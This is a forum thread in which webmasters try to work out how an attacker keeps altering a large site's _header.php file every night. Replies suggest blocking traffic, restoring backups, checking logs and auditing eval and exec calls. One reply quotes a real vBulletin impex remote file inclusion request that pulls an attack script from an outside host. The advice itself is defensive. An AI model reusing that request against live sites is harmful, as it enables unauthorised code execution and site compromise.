Gday Ridds.

We are still unsure as to the vulnerability, and route in !
I will copy and paste this to , my Lad.

We will try and see if there are any such compromises, and re code it appropriately.

Because of the sheer size of the site, its gonna be painstaking work.. but gotta be done !!!

Many thanks, have sent you K

Will report back ASAP

This is from a damage limitation point of view but you could try the following for a short period of time (unless the site needs specific access 24x7).

1. Block all traffic for a given time (say a window of 5 mins from 2.20am to 2.25am), if the change is at the same time each night.

2. Capture all IP addresses for thay time period to narrow down then compare over say 3 days, may narrow down unless its floating or masked.

3. Replace the amended file with a good backup copy each night for a period of time (from a scheduled event), they may get bored and leave you alone if its not working for them.

Just hope they don't come to me and my web enabled SharePoint sites....ahhhh!
Good luck hunting and frying the little sods.

Read http://en.wikipedia.org/wiki/Code_injection

Check all eval, system ,exec , require calls

If you have other modules, search the web for known hacks.

I've had several forum hacks and deletions over the years.

Last one was vbulletin impex hack which they uploaded hacking scripts

impex/ImpExController.php?systempath=http%3A%2F%2Fmusicr ox1.altervista.org%2Frmod.txt%3F&act=f&f=general.p l&ft=edit&d=%2Ftmp%2F.ICE-unix

Tracing the logs for 'general' and then deleting the impex code ( only used for forum import ) was the solution, but it took a week of fighting the hacker and finding the upload point.

That would make sense, as most of the day, Aussie time, AEST traffic is at about 100-250 users online.
Couldnt do it at 2am AEST , as this is busiest period. And theres usually about 800+ users online. Which is USA time, and when the prick is doing his bit.

Good lateral thinking tho !!!!

We have had compromises in the past, and VB was a major issue. So too on another site, was an Ecommerce script that we used.
Im not sure, but since we migrated to a diff server, the security issues have worsened.

There is a small forum on the site, but this has only been done recently, and albeit its VB it could be an issue. I will do some checks.

Somehow, I reckon its a SQL issue... not sure on that or the implications, but other than the httpd conf possibility, its my only "guestimate"

If only we could run a trace on the IP that changed the file !!!
ANother issue is logging, this is set to off, as the site currently uses about 5 gig a day in bandwidth !! So the logs would actually bust ftp/php/ and mysql.

We used to run logs, but the files were just bloody enormous. At approx 1 mill page views per day, and approx 150,000 uniques for a non forum based site, actually pinpointing (globally ) the issue is quite daunting !!!

Hence i figured, HELL.. lets whack a sniffer on the server ( somehow ) that alerts us, when a file is actually changed via FTP.

Have searched Google, but to no avail.... still no luck on other forums

Easy enough to write a little shell/perl script that loops around every 30 seconds and emails you when the date on the file changes, and perhaps replaced the file back, but thats no going to track the offender.

Def check for vb , and calender scripts as they are a major source of hacks. Delete or rename the impex directory in vb if you still have it.

Which Linux distribution and version are you running?

Which versions of Apache and PHP?

Also, a look at the php.ini and the Apache config files could help us track down any security issues.

Does the hosted environment provide any pre-installed CGI or web utilities, such as formmail? Some of these are known to be insecure.

If the _header.php file is changing on a daily basis, I strongly suspect that the attacker has a scheduled scripted exploit running from *his* server. Does the hacked file show a modified date/time? If so, is the time consistent from day to day?

And, further to a previous posters question, what user is the Apache webserver running as? This user should only have read access to _header.php.

Do you have access to the servers APACHE logs?

if you know where he is coming from you can trace back through the log files (takes ages, been there done that) this mght give you extra information on where he is coming from and what he is calling assuming you have his IP address or similar. If you want me to give a hand PM us.

Thanks for the replies...

Its all a bit beyond me !!! and thats the truth.

Its my sons site, and he has done all hard coding. My limits stretch to setting up mysql, basic php, and file permissions.

Regarding apache/httpd etc its a tad beyond my knowledge and comfort zone.

.... will post back the info ASAP thankyou

Let us know what the end result is.

Any news? Or are you and your son both still knee-deep in code?

Stupid question - have you checked your home PC's for a keylogger? Is your site secure against cross-site scripting? Has the perp installed some sort of dial home scripting via a MySQL injection?

Does your site use plesk or cpanel? Most panels have a way of viewing last 300 or so visotors, and a way of viewing error logs and server logs. You could d/l the log and run a grep on it (google if you don't know wtf I mean) and see if there's patterns in the way your site is accessed. PHP scripts are usually written (when written properly) to be only accessed in a certain way or from a certain file beforehand. Pretty much like this.

Good luck with it.